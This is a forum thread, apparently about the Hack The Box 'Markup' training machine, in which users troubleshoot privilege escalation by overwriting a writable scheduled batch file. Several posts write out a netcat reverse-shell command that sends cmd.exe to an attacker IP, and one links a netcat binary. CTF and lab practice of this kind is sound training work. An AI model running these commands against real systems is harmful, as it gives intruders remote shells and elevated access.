I’ve been struggling with markup since a few days ago and its always in the same spot. I can’t seem to get a reverse shell. I edit the job.bat file and nothing happens it just reverts and the Ncat listener doesn’t give me a shell. I hope someone can help and in the process help others so thank you in advance.
I’ve been having a similar or the same problem. I have no idea why, but it’s saying that the architecture is wrong somehow. I think then the task overrides the job.bat again and continues as normal. I have tried the 32 bit version of nc.exe as well. I cannot figure out how to root this box. I have followed the walkthrough to a T. Does anyone have any insight?
This version of c:\Log-Management\nc64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.
daniel@MARKUP c:\Log-Management>type job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
daniel@MARKUP c:\Log-Management>echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.97 1234 > C:\Log-Management\job.bat
daniel@MARKUP c:\Log-Management>type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.97 1234
daniel@MARKUP c:\Log-Management>type job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
For anyone who needs it, download nc.exe instead of nc64.exe if you have this issue.
I’ve used nc64.exe and nc.exe from the suggested sources in Git Hub, I’ve restarted about 12-13 instances/boxes to root this machine. when running “echo C:\Log-Management\nc.exe -e cmd.exe 10.10.14.145 2000 > C:\Log-Management\job.bat” works like a charm, but the nc reverse shell doesn’t pickup anything and it remains on the same status "listening on [any] 2000…'. I’ve also tried different ports as well, but no luck. This is the only machine I have left in all 3 tiers. I’ve also follow the Walkthrough and reviewed many times, watch YouTube Videos, and other articles online. I wait between 10 mins max before restarting the Machine. I’ve restarted the VM and reconnected to the HTB VPN but no luck. Any recommendations?
Hi there!
I encountered a similar challenge with the Markup box in HTB. The issue might be with nc64.exe
, which isn’t compatible with the HTB lab VM machine. I switched to a different version of NetCat, and it worked perfectly. You can download nc64-32.exe
from this link: https://github.com/vinsworldcom/NetCat64/releases/download/1.11.6.4/nc64-32.exe.
Also, regarding wevtutil
, it doesn’t run continuously but periodically. To keep an eye on it, you can use the ps
command in PowerShell to monitor its activity every second from within the VM lab. This should give you better insights for your privilege escalation attempt.
Hope this helps and best of luck with your HTB challenge!
On ssh session, run the “echo…” on the C:\windows\system32 directory.
Also having the issue listed above. The machine simply doesn’t connect back to the listener. The job.bat file is overwritten but never seems to execute.
ETA: Nevermind, the ‘echo’ command must include the full path to the nc executable. This works correctly as of the date of this post.
For anyone else looking for a solution to this issue, nc64-32 worked for me. Thanks, @trainfosec!